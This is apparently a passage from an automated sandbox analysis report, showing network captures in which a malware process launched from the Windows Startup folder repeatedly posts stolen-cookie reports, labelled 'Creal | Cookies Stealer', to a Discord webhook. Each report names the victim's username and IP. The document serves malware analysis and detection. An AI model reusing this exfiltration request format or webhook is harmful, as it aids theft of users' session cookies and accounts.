                                                                                                                                                                                                                                                                                                2024-09-27 16:19:16 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:16 UTC1341INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:16 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3dc1a8587cec11ef820dd2e2dbf32e93; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453957
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FsnFqJvXlU%2BwbM284fPah8DEEMLoHF79%2ByVP3zX5yY6w2vcYVMJJP8CIgb8taqqDF%2Bi%2FN7UMhI7HMlyE3xLwHN%2BTxnaKQH3eDgSnveqrVJ4AfIAC4gZBqiPvUHDV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3dc1a8587cec11ef820dd2e2dbf32e937fca7de2edb84f95324207f86c51753bdba706d58d230b7676189baa895fcef8; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=54de805462c8499a30bede896a7ff29380fc6fc8-1727453956; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:16 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 4b 78 42 4e 5f 54 66 68 45 57 6c 4f 61 44 45 30 64 4b 5f 7a 69 4a 59 66 45 45 4b 42 39 32 62 69 36 44 4b 44 74 6d 4e 50 53 59 51 2d 31 37 32 37 34 35 33 39 35 36 32 31 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 37 61 30 66 64 38 37 32 62 37 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=KxBN_TfhEWlOaDE0dK_ziJYfEEKB92bi6DKDtmNPSYQ-1727453956213-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd07a0fd872b7-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:16 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                64192.168.2.849779162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:16 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:16 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:16 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:16 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3e251fdc7cec11ef963cbe4fcb513092; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453958
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z6rjdjZ8kvmdTE%2B9gYZyS3cRo6znglB7LfM7m%2F42MoGnlGw4rRTTrGKAPNdeif3iRGaxI5YsftF9BaBUxxA6s6LR1%2BDJULwTdMmYSt4VNtJ7Dz70MJEEJWRf2WKl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3e251fdc7cec11ef963cbe4fcb513092934b8e633dcc6eb2e11fd1c92a5613ed8d8ebdb0dea4b547b3e1167c1e4bcc4b; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=54de805462c8499a30bede896a7ff29380fc6fc8-1727453956; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:16 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 68 51 72 72 6b 6b 44 78 59 69 38 7a 66 53 64 6e 4b 37 36 57 30 75 7a 4e 50 69 37 35 34 54 67 36 73 58 63 48 72 6e 48 6d 42 34 41 2d 31 37 32 37 34 35 33 39 35 36 38 37 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 37 65 30 38 35 36 34 32 34 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=hQrrkkDxYi8zfSdnK76W0uzNPi754Tg6sXcHrnHmB4A-1727453956871-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd07e0856424f-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:16 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                65192.168.2.849780162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:17 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:17 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:17 UTC1337INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:17 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3e8eacae7cec11efb084ba898f4f55ff; Expires=Wed, 26-Sep-2029 16:19:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453958
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBe5Lo%2BZ9POrxFT%2BX8e%2Fr39FsO2uZnqiHDXXLCg6xr5nmLq%2F9zrH3I3Q7mE7SVR1F0zAxLZtuCr7ec80lKoNMSRPKQWPeodfuMkPFfLOnThAC755nhiWy9qxORN7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3e8eacae7cec11efb084ba898f4f55ffa348a94986f4ef5989f8f29c7c0361ba202c30265a26f83609f9c4341f6e938a; Expires=Wed, 26-Sep-2029 16:19:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=0a8884e8c86705b67a0572bb98a4aef4adcfb203-1727453957; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:17 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 67 76 6e 54 56 6c 6b 76 4d 77 55 69 50 4b 49 53 52 37 57 38 76 32 4c 50 42 44 50 36 33 47 7a 72 64 30 78 6b 36 4e 34 6e 35 6d 55 2d 31 37 32 37 34 35 33 39 35 37 35 36 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 38 32 33 65 61 62 37 63 62 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=gvnTVlkvMwUiPKISR7W8v2LPBDP63Gzrd0xk6N4n5mU-1727453957560-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0823eab7cb1-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:17 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                66192.168.2.849781162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:18 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:18 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:18 UTC1363INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:18 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3ef7a3b27cec11efb7d86adb8ffda96a; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453959
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abr%2BUjwiujgyO3tgGe0ukf1vX6sSJOD0Z0pRX16NhBSAGQvuLnHfBSKYjOmJPBN0cw8V3p1PVK8osR7Zw6WIVCE2ovtL9oqCWMFP0bOovDkWl2pL%2BoDNGxJyQhwG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3ef7a3b27cec11efb7d86adb8ffda96ac79ebdd9ab702b83537aa31e2267ad1cdce4093222083a94b0278809b91f97f3; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=c387d6a5af5e9ff58e66aa3262890441f071e70d-1727453958; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:18 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 43 5a 73 41 4c 6d 6d 6c 72 35 78 74 6c 76 51 4b 55 63 57 6e 45 50 44 4c 77 38 6f 79 73 71 56 54 31 53 4d 65 4c 6c 4e 59 49 6f 30 2d 31 37 32 37 34 35 33 39 35 38 32 34 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 38 36 61 38 35 61 34 33 36 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=CZsALmmlr5xtlvQKUcWnEPDLw8oysqVT1SMeLlNYIo0-1727453958244-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd086a85a4361-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:18 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                67192.168.2.849782162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:18 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:18 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:18 UTC1337INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:18 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3f60d4367cec11efb6bfce5421a2957b; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453960
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
